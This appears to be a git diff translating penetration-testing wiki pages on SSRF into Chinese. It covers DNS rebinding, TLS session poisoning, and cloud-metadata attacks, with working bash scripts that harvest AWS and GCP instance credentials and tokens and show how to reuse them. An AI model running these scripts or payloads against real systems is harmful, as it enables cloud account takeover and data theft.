@@ -284,87 +259,84 @@ $response = file_get_contents($proxy_site);
 var_dump($response);
 ?>
 ```
-
 </details>
 
-PHP allows the use of the **char `*` before a slash in the path** of the URL, however, it has other limitations like that it can only be used for the root pathname `/` and that dots `.` are not permitted before the first slash, so it's needed to use a dotless-hex encoded IP address for example:
-
+PHP 允许在 URL 的路径中使用 **字符 `*` 在斜杠之前**，但是它还有其他限制，比如它只能用于根路径 `/`，并且在第一个斜杠之前不允许使用点 `.`，因此需要使用无点的十六进制编码 IP 地址，例如：
 ```http
 GET *@0xa9fea9fe/ HTTP/1.1
 Host: target.com
 Connection: close
 ```
+## DNS Rebidding CORS/SOP 绕过
 
-## DNS Rebidding CORS/SOP bypass
-
-If you are having **problems** to **exfiltrate content from a local IP** because of **CORS/SOP**, **DNS Rebidding** can be used to bypass that limitation:
+如果您在 **从本地 IP 中提取内容** 时遇到 **CORS/SOP** 的 **问题**，可以使用 **DNS Rebidding** 来绕过该限制：
 
 {{#ref}}
 ../cors-bypass.md
 {{#endref}}
 
-### Automated DNS Rebidding
+### 自动化 DNS Rebidding
 
-[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) is a tool to perform [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) attacks. It includes the necessary components to rebind the IP address of the attack server DNS name to the target machine's IP address and to serve attack payloads to exploit vulnerable software on the target machine.
+[**`Singularity of Origin`**](https://github.com/nccgroup/singularity) 是一个执行 [DNS rebinding](https://en.wikipedia.org/wiki/DNS_rebinding) 攻击的工具。它包含了将攻击服务器的 DNS 名称的 IP 地址重新绑定到目标机器的 IP 地址所需的组件，并向目标机器提供攻击有效载荷以利用易受攻击的软件。
 
-Check out also the **publicly running server in** [**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)
+还可以查看 **公共运行的服务器** [**http://rebind.it/singularity.html**](http://rebind.it/singularity.html)
 
-## DNS Rebidding + TLS Session ID/Session ticket
+## DNS Rebidding + TLS 会话 ID/会话票证
 
-Requirements:
+要求：
 
 - **SSRF**
-- **Outbound TLS sessions**
-- **Stuff on local ports**
+- **出站 TLS 会话**
+- **本地端口上的内容**
 
-Attack:
+攻击：
 
-1. Ask the user/bot **access** a **domain** controlled by the **attacker**
-2. The **TTL** of the **DNS** is **0** sec (so the victim will check the IP of the domain again soon)
-3. A **TLS connection** is created between the victim and the domain of the attacker. The attacker introduces the **payload inside** the **Session ID or Session Ticket**.
-4. The **domain** will start an **infinite loop** of redirects against **himself**. The goal of this is to make the user/bot access the domain until it perform **again** a **DNS request** of the domain.
-5. In the DNS request a **private IP** address is given **now** (127.0.0.1 for example)
-6. The user/bot will try to **reestablish the TLS connection** and in order to do so it will **send** the **Session** ID/Ticket ID (where the **payload** of the attacker was contained). So congratulations you managed to ask the **user/bot attack himself**.
+1. 请求用户/机器人 **访问** 由 **攻击者** 控制的 **域名**
+2. **DNS** 的 **TTL** 为 **0** 秒（因此受害者将很快再次检查该域名的 IP）
+3. 在受害者和攻击者的域名之间建立 **TLS 连接**。攻击者将 **有效载荷放入** **会话 ID 或会话票证** 中。
+4. **域名** 将开始对 **自己** 的 **无限重定向** 循环。这样做的目的是让用户/机器人访问该域名，直到它 **再次** 执行该域名的 **DNS 请求**。
+5. 在 DNS 请求中 **现在** 提供了一个 **私有 IP** 地址（例如 127.0.0.1）
+6. 用户/机器人将尝试 **重新建立 TLS 连接**，为此它将 **发送** **会话** ID/票证 ID（其中包含了攻击者的 **有效载荷**）。恭喜你成功地让 **用户/机器人攻击自己**。
 
-Note that during this attack, if you want to attack localhost:11211 (_memcache_) you need to make the victim establish the initial connection with www.attacker.com:11211 (the **port must always be the same**).\
-To **perform this attack you can use the tool**: [https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
-For **more information** take a look to the talk where this attack is explained: [https://www.youtube.com/watch?v=qGpAJxfADjo\&ab_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference)
+请注意，在此攻击期间，如果您想攻击 localhost:11211 (_memcache_)，您需要让受害者与 www.attacker.com:11211 建立初始连接（**端口必须始终相同**）。\
+要 **执行此攻击，您可以使用工具**：[https://github.com/jmdx/TLS-poison/](https://github.com/jmdx/TLS-poison/)\
+有关 **更多信息**，请查看解释此攻击的演讲：[https://www.youtube.com/watch?v=qGpAJxfADjo\&ab_channel=DEFCONConference](https://www.youtube.com/watch?v=qGpAJxfADjo&ab_channel=DEFCONConference)
 
 ## Blind SSRF
 
-The difference between a blind SSRF and a not blind one is that in the blind you cannot see the response of the SSRF request. Then, it is more difficult to exploit because you will be able to exploit only well-known vulnerabilities.
+盲 SSRF 和非盲 SSRF 之间的区别在于，在盲 SSRF 中您无法看到 SSRF 请求的响应。因此，利用它更困难，因为您只能利用已知的漏洞。
 
-### Time based SSRF
+### 基于时间的 SSRF
 
-**Checking the time** of the responses from the server it might be **possible to know if a resource exists or not** (maybe it takes more time accessing an existing resource than accessing one that doesn't exist)
+**检查来自服务器的响应时间**，可能 **知道资源是否存在**（也许访问现有资源的时间比访问不存在的资源要长）
 
-## Cloud SSRF Exploitation
+## Cloud SSRF 利用
 
-If you find a SSRF vulnerability in a machine running inside a cloud environment you might be able to obtain interesting information about the cloud environment and even credentials:
+如果您在云环境中运行的机器上发现 SSRF 漏洞，您可能能够获得有关云环境的有趣信息，甚至是凭据：
 
 {{#ref}}
 cloud-ssrf.md
 {{#endref}}
 
-## SSRF Vulnerable Platforms
+## SSRF 漏洞平台
 
-Several known platforms contains or has contained SSRF vulnerabilities, check them in:
+几个已知平台包含或曾包含 SSRF 漏洞，请查看：
 
 {{#ref}}
 ssrf-vulnerable-platforms.md
 {{#endref}}
 
-## Tools
+## 工具
 
 ### [**SSRFMap**](https://github.com/swisskyrepo/SSRFmap)
 
-Tool to detect and exploit SSRF vulnerabilities
+用于检测和利用 SSRF 漏洞的工具
 
 ### [Gopherus](https://github.com/tarunkant/Gopherus)
 
-- [Blog post on Gopherus](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
+- [关于 Gopherus 的博客文章](https://spyclub.tech/2018/08/14/2018-08-14-blog-on-gopherus/)
 
-This tool generates Gopher payloads for:
+该工具生成 Gopher 有效载荷用于：
 
 - MySQL
 - PostgreSQL
@@ -375,19 +347,19 @@ This tool generates Gopher payloads for:
 
 ### [remote-method-guesser](https://github.com/qtc-de/remote-method-guesser)
 
-- [Blog post on SSRF usage](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)
+- [关于 SSRF 使用的博客文章](https://blog.tneitzel.eu/posts/01-attacking-java-rmi-via-ssrf/)
 
-_remote-method-guesser_ is a _Java RMI_ vulnerability scanner that supports attack operations for most common _Java RMI_ vulnerabilities. Most of the available operations support the `--ssrf` option, to generate an _SSRF_ payload for the requested operation. Together with the `--gopher` option, ready to use _gopher_ payloads can be generated directly.
+_remote-method-guesser_ 是一个 _Java RMI_ 漏洞扫描器，支持大多数常见 _Java RMI_ 漏洞的攻击操作。大多数可用操作支持 `--ssrf` 选项，以生成请求操作的 _SSRF_ 有效载荷。结合 `--gopher` 选项，可以直接生成可用的 _gopher_ 有效载荷。
 
 ### [SSRF Proxy](https://github.com/bcoles/ssrf_proxy)
 
-SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP traffic through HTTP servers vulnerable to Server-Side Request Forgery (SSRF).
+SSRF Proxy 是一个多线程 HTTP 代理服务器，旨在通过易受服务器端请求伪造 (SSRF) 攻击的 HTTP 服务器隧道客户端 HTTP 流量。
 
-### To practice
+### 练习
 
 {% embed url="https://github.com/incredibleindishell/SSRF_Vulnerable_Lab" %}
 
-## References
+## 参考
 
 - [https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4](https://medium.com/@pravinponnusamy/ssrf-payloads-f09b2a86a8b4)
 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Server%20Side%20Request%20Forgery)
@@ -399,8 +371,7 @@ SSRF Proxy is a multi-threaded HTTP proxy server designed to tunnel client HTTP
 <figure><img src="../../images/image (48).png" alt=""><figcaption></figcaption></figure>
 
 \
-Use [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\
-Get Access Today:
+使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=ssrf-server-side-request-forgery) 轻松构建和 **自动化工作流**，由世界上 **最先进** 的社区工具提供支持。\
+今天就获取访问权限：
 
 {% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=ssrf-server-side-request-forgery" %}
-
diff --git a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
index dbbcca9d2..01fa1c553 100644
--- a/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
+++ b/src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
@@ -4,19 +4,18 @@
 
 ## AWS
 
-### Abusing SSRF in AWS EC2 environment
+### 在 AWS EC2 环境中滥用 SSRF
 
-**The metadata** endpoint can be accessed from inside any EC2 machine and offers interesting information about it. It's accesible in the url: `http://169.254.169.254` ([information about the metadata here](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html)).
+**元数据** 端点可以从任何 EC2 机器内部访问，并提供有关它的有趣信息。它可以通过以下 URL 访问: `http://169.254.169.254` ([关于元数据的信息在这里](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html))。
 
-There are **2 versions** of the metadata endpoint. The **first** one allows to **access** the endpoint via **GET** requests (so any **SSRF can exploit it**). For the **version 2**, [IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html), you need to ask for a **token** sending a **PUT** request with a **HTTP header** and then use that token to access the metadata with another HTTP header (so it's **more complicated to abuse** with a SSRF).
+元数据端点有 **2 个版本**。**第一个** 版本允许通过 **GET** 请求 **访问** 该端点（因此任何 **SSRF 都可以利用它**）。对于 **版本 2**，[IMDSv2](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/configuring-instance-metadata-service.html)，您需要通过发送带有 **HTTP 头** 的 **PUT** 请求来请求 **令牌**，然后使用该令牌通过另一个 HTTP 头访问元数据（因此用 SSRF 滥用它 **更复杂**）。
 
 > [!CAUTION]
-> Note that if the EC2 instance is enforcing IMDSv2, [**according to the docs**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html), the **response of the PUT request** will have a **hop limit of 1**, making impossible to access the EC2 metadata from a container inside the EC2 instance.
+> 请注意，如果 EC2 实例强制执行 IMDSv2，[**根据文档**](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instance-metadata-v2-how-it-works.html)，**PUT 请求的响应** 将具有 **跳数限制为 1**，使得无法从 EC2 实例内部的容器访问 EC2 元数据。
 >
-> Moreover, **IMDSv2** will also **block requests to fetch a token that include the `X-Forwarded-For` header**. This is to prevent misconfigured reverse proxies from being able to access it.
-
-You can find information about the [metadata endpoints in the docs](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html). In the following script some interesting information is obtained from it:
+> 此外，**IMDSv2** 还将 **阻止包含 `X-Forwarded-For` 头的请求以获取令牌**。这是为了防止配置错误的反向代理能够访问它。
 
+您可以在文档中找到有关 [元数据端点的信息](https://docs.aws.amazon.com/AWSEC2/latest/UserGuide/instancedata-data-categories.html)。在以下脚本中，从中获取了一些有趣的信息：
 ```bash
 EC2_TOKEN=$(curl -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
 HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
@@ -24,11 +23,11 @@ URL="http://169.254.169.254/latest/meta-data"
 
 aws_req=""
 if [ "$(command -v curl)" ]; then
-    aws_req="curl -s -f -H '$HEADER'"
+aws_req="curl -s -f -H '$HEADER'"
 elif [ "$(command -v wget)" ]; then
-    aws_req="wget -q -O - -H '$HEADER'"
+aws_req="wget -q -O - -H '$HEADER'"
 else
-    echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
 fi
 
 printf "ami-id: "; eval $aws_req "$URL/ami-id"; echo ""
@@ -46,25 +45,25 @@ eval $aws_req "http://169.254.169.254/latest/dynamic/instance-identity/document"
 echo ""
 echo "Network Info"
 for mac in $(eval $aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
-  echo "Mac: $mac"
-  printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
-  printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
-  printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
-  echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
-  printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
-  echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
-  printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
-  echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
-  echo ""
+echo "Mac: $mac"
+printf "Owner ID: "; eval $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
+printf "Public Hostname: "; eval $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
+printf "Security Groups: "; eval $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
+echo "Private IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
+printf "Subnet IPv4: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
+echo "PrivateIPv6s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
+printf "Subnet IPv6: "; eval $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
+echo "Public IPv4s:"; eval $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
+echo ""
 done
 
 echo ""
 echo "IAM Role"
 eval $aws_req "$URL/iam/info"
 for role in $(eval $aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
-  echo "Role: $role"
-  eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
-  echo ""
+echo "Role: $role"
+eval $aws_req "$URL/iam/security-credentials/$role"; echo ""
+echo ""
 done
 
 echo ""
@@ -76,89 +75,79 @@ echo ""
 echo "EC2 Security Credentials"
 eval $aws_req "$URL/identity-credentials/ec2/security-credentials/ec2-instance"; echo ""
 ```
+作为一个**公开可用的IAM凭证**暴露示例，您可以访问：[http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
 
-As a **publicly available IAM credentials** exposed example you can visit: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/iam/security-credentials/flaws)
+您还可以在以下地址检查公共**EC2安全凭证**：[http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance)
 
-You can also check public **EC2 security credentials** in: [http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance](http://4d0cf09b9b2d761a7d87be99d17507bce8b86f3b.flaws.cloud/proxy/169.254.169.254/latest/meta-data/identity-credentials/ec2/security-credentials/ec2-instance)
-
-You can then take **those credentials and use them with the AWS CLI**. This will allow you to do **anything that role has permissions** to do.
-
-To take advantage of the new credentials, you will need to crate a new AWS profile like this one:
+然后，您可以**使用这些凭证与AWS CLI**。这将允许您执行**该角色具有权限**的任何操作。
 
+要利用新凭证，您需要创建一个新的AWS配置文件，如下所示：
 ```
 [profilename]
 aws_access_key_id = ASIA6GG71[...]
 aws_secret_access_key = a5kssI2I4H/atUZOwBr5Vpggd9CxiT[...]
 aws_session_token = AgoJb3JpZ2luX2VjEGcaCXVzLXdlc3QtMiJHMEUCIHgCnKJl8fwc+0iaa6n4FsgtWaIikf5mSSoMIWsUGMb1AiEAlOiY0zQ31XapsIjJwgEXhBIW3u/XOfZJTrvdNe4rbFwq2gMIYBAAGgw5NzU0MjYyNjIwMjkiDCvj4qbZSIiiBUtrIiq3A8IfXmTcebRDxJ9BGjNwLbOYDlbQYXBIegzliUez3P/fQxD3qDr+SNFg9w6WkgmDZtjei6YzOc/a9TWgIzCPQAWkn6BlXufS+zm4aVtcgvBKyu4F432AuT4Wuq7zrRc+42m3Z9InIM0BuJtzLkzzbBPfZAz81eSXumPdid6G/4v+o/VxI3OrayZVT2+fB34cKujEOnBwgEd6xUGUcFWb52+jlIbs8RzVIK/xHVoZvYpY6KlmLOakx/mOyz1tb0Z204NZPJ7rj9mHk+cX/G0BnYGIf8ZA2pyBdQyVbb1EzV0U+IPlI+nkIgYCrwTCXUOYbm66lj90frIYG0x2qI7HtaKKbRM5pcGkiYkUAUvA3LpUW6LVn365h0uIbYbVJqSAtjxUN9o0hbQD/W9Y6ZM0WoLSQhYt4jzZiWi00owZJjKHbBaQV6RFwn5mCD+OybS8Y1dn2lqqJgY2U78sONvhfewiohPNouW9IQ7nPln3G/dkucQARa/eM/AC1zxLu5nt7QY8R2x9FzmKYGLh6sBoNO1HXGzSQlDdQE17clcP+hrP/m49MW3nq/A7WHIczuzpn4zv3KICLPIw2uSc7QU6tAEln14bV0oHtHxqC6LBnfhx8yaD9C71j8XbDrfXOEwdOy2hdK0M/AJ3CVe/mtxf96Z6UpqVLPrsLrb1TYTEWCH7yleN0i9koRQDRnjntvRuLmH2ERWLtJFgRU2MWqDNCf2QHWn+j9tYNKQVVwHs3i8paEPyB45MLdFKJg6Ir+Xzl2ojb6qLGirjw8gPufeCM19VbpeLPliYeKsrkrnXWO0o9aImv8cvIzQ8aS1ihqOtkedkAsw=
 ```
+注意 **aws_session_token**，这是使配置文件正常工作的必需品。
 
-Notice the **aws_session_token**, this is indispensable for the profile to work.
+[**PACU**](https://github.com/RhinoSecurityLabs/pacu) 可以与发现的凭据一起使用，以找出您的权限并尝试提升权限。
 
-[**PACU**](https://github.com/RhinoSecurityLabs/pacu) can be used with the discovered credentials to find out your privileges and try to escalate privileges
+### AWS ECS（容器服务）中的 SSRF 凭据
 
-### SSRF in AWS ECS (Container Service) credentials
-
-**ECS**, is a logical group of EC2 instances on which you can run an application without having to scale your own cluster management infrastructure because ECS manages that for you. If you manage to compromise service running in **ECS**, the **metadata endpoints change**.
-
-If you access _**http://169.254.170.2/v2/credentials/\<GUID>**_ you will find the credentials of the ECS machine. But first you need to **find the \<GUID>**. To find the \<GUID> you need to read the **environ** variable **AWS_CONTAINER_CREDENTIALS_RELATIVE_URI** inside the machine.\
-You could be able to read it exploiting an **Path Traversal** to `file:///proc/self/environ`\
-The mentioned http address should give you the **AccessKey, SecretKey and token**.
+**ECS** 是一组逻辑上的 EC2 实例，您可以在其上运行应用程序，而无需扩展自己的集群管理基础设施，因为 ECS 为您管理这一切。如果您成功地攻陷在 **ECS** 中运行的服务，**元数据端点会发生变化**。
 
+如果您访问 _**http://169.254.170.2/v2/credentials/\<GUID>**_，您将找到 ECS 机器的凭据。但首先，您需要 **找到 \<GUID>**。要找到 \<GUID>，您需要读取机器内部的 **environ** 变量 **AWS_CONTAINER_CREDENTIALS_RELATIVE_URI**。\
+您可以通过利用 **路径遍历** 来读取它，路径为 `file:///proc/self/environ`。\
+提到的 http 地址应该会给您 **AccessKey、SecretKey 和 token**。
 ```bash
 curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" 2>/dev/null || wget "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" -O -
 ```
-
 > [!NOTE]
-> Note that in **some cases** you will be able to access the **EC2 metadata instance** from the container (check IMDSv2 TTL limitations mentioned previously). In these scenarios from the container you could access both the container IAM role and the EC2 IAM role.
+> 请注意，在**某些情况下**，您将能够从容器访问**EC2元数据实例**（请检查之前提到的IMDSv2 TTL限制）。在这些场景中，您可以从容器访问容器的IAM角色和EC2的IAM角色。
 
 ### SSRF for AWS Lambda <a href="#id-6f97" id="id-6f97"></a>
 
-In this case the **credentials are stored in env variables**. So, to access them you need to access something like **`file:///proc/self/environ`**.
+在这种情况下，**凭证存储在环境变量中**。因此，要访问它们，您需要访问类似于**`file:///proc/self/environ`**的内容。
 
-The **name** of the **interesting env variables** are:
+**有趣的环境变量**的**名称**是：
 
 - `AWS_SESSION_TOKEN`
 - `AWS_SECRET_ACCESS_KEY`
 - `AWS_ACCES_KEY_ID`
 
-Moreover, in addition to IAM credentials, Lambda functions also have **event data that is passed to the function when it is started**. This data is made available to the function via the [runtime interface](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html) and could contain **sensitive** **information** (like inside the **stageVariables**). Unlike IAM credentials, this data is accessible over standard SSRF at **`http://localhost:9001/2018-06-01/runtime/invocation/next`**.
+此外，除了IAM凭证，Lambda函数在启动时还会有**传递给函数的事件数据**。这些数据通过[运行时接口](https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html)提供给函数，并可能包含**敏感**的**信息**（例如在**stageVariables**中）。与IAM凭证不同，这些数据可以通过标准SSRF访问**`http://localhost:9001/2018-06-01/runtime/invocation/next`**。
 
 > [!WARNING]
-> Note that **lambda credentials** are inside the **env variables**. So if the **stack trace** of the lambda code prints env vars, it's possible to **exfiltrate them provoking an error** in the app.
+> 请注意，**lambda凭证**在**环境变量**中。因此，如果lambda代码的**堆栈跟踪**打印环境变量，则可能通过在应用中**引发错误**来**外泄它们**。
 
 ### SSRF URL for AWS Elastic Beanstalk <a href="#id-6f97" id="id-6f97"></a>
 
-We retrieve the `accountId` and `region` from the API.
-
+我们从API中检索`accountId`和`region`。
 ```
 http://169.254.169.254/latest/dynamic/instance-identity/document
 http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
 ```
-
-We then retrieve the `AccessKeyId`, `SecretAccessKey`, and `Token` from the API.
-
+然后我们从 API 中获取 `AccessKeyId`、`SecretAccessKey` 和 `Token`。
 ```
 http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbeanorastalk-ec2-role
 ```
-
 ![](https://miro.medium.com/max/60/0*4OG-tRUNhpBK96cL?q=20) ![](https://miro.medium.com/max/1469/0*4OG-tRUNhpBK96cL)
 
-Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`.
+然后我们使用凭据执行 `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`。
 
 ## GCP <a href="#id-6440" id="id-6440"></a>
 
-You can [**find here the docs about metadata endpoints**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata).
+您可以 [**在这里找到关于元数据端点的文档**](https://cloud.google.com/appengine/docs/standard/java/accessing-instance-metadata)。
 
-### SSRF URL for Google Cloud <a href="#id-6440" id="id-6440"></a>
+### Google Cloud 的 SSRF URL <a href="#id-6440" id="id-6440"></a>
 
-Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs:
+需要 HTTP 头 **`Metadata-Flavor: Google`**，您可以通过以下 URL 访问元数据端点：
 
 - http://169.254.169.254
 - http://metadata.google.internal
 - http://metadata
 
-Interesting endpoints to extract information:
-
+提取信息的有趣端点：
 ```bash
 # /project
 # Project name and number
@@ -198,22 +187,22 @@ curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/insta
 curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/attributes/startup-script"
 # Network Interfaces
 for iface in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/"); do
-    echo "  IP: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
-    echo "  Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
-    echo "  Gateway: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
-    echo "  DNS: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
-    echo "  Network: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
-    echo "  ==============  "
+echo "  IP: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/ip")
+echo "  Subnetmask: "$(curl -s -f -H "X-Google-Metadata-Request: True" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
+echo "  Gateway: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
+echo "  DNS: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
+echo "  Network: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/network-interfaces/$iface/network")
+echo "  ==============  "
 done
 # Service Accounts
 for sa in $(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/"); do
-    echo "  Name: $sa"
-    echo "  Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
-    echo "  Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
-    echo "  Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
-    echo "  Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
-    echo "  Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
-    echo "  ==============  "
+echo "  Name: $sa"
+echo "  Email: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}email")
+echo "  Aliases: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}aliases")
+echo "  Identity: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}identity")
+echo "  Scopes: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}scopes")
+echo "  Token: "$(curl -s -f -H "Metadata-Flavor: Google" "http://metadata/computeMetadata/v1/instance/service-accounts/${sa}token")
+echo "  ==============  "
 done
 # K8s Attributtes
 ## Cluster location
@@ -231,68 +220,58 @@ curl -s -f -H "Metadata-Flavor: Google" http://metadata/computeMetadata/v1/insta
 
 # All custom project attributes
 curl "http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true&alt=text" \
-    -H "Metadata-Flavor: Google"
+-H "Metadata-Flavor: Google"
 
 # All custom project attributes instance attributes
 curl "http://metadata.google.internal/computeMetadata/v1/instance/attributes/?recursive=true&alt=text" \
-    -H "Metadata-Flavor: Google"
+-H "Metadata-Flavor: Google"
 ```
-
-Beta does NOT require a header atm (thanks Mathias Karlsson @avlidienbrunn)
-
+Beta 目前不需要头部 (感谢 Mathias Karlsson @avlidienbrunn)
 ```
 http://metadata.google.internal/computeMetadata/v1beta1/
 http://metadata.google.internal/computeMetadata/v1beta1/?recursive=true
 ```
-
 > [!CAUTION]
-> In order to **use the exfiltrated service account token** you can just do:
+> 为了**使用泄露的服务账户令牌**，您可以执行以下操作：
 >
 > ```bash
-> # Via env vars
+> # 通过环境变量
 > export CLOUDSDK_AUTH_ACCESS_TOKEN=<token>
 > gcloud projects list
 >
-> # Via setup
+> # 通过设置
 > echo "<token>" > /some/path/to/token
 > gcloud config set auth/access_token_file /some/path/to/token
 > gcloud projects list
 > gcloud config unset auth/access_token_file
 > ```
 
-### Add an SSH key <a href="#id-3e24" id="id-3e24"></a>
-
-Extract the token
+### 添加 SSH 密钥 <a href="#id-3e24" id="id-3e24"></a>
 
+提取令牌
 ```
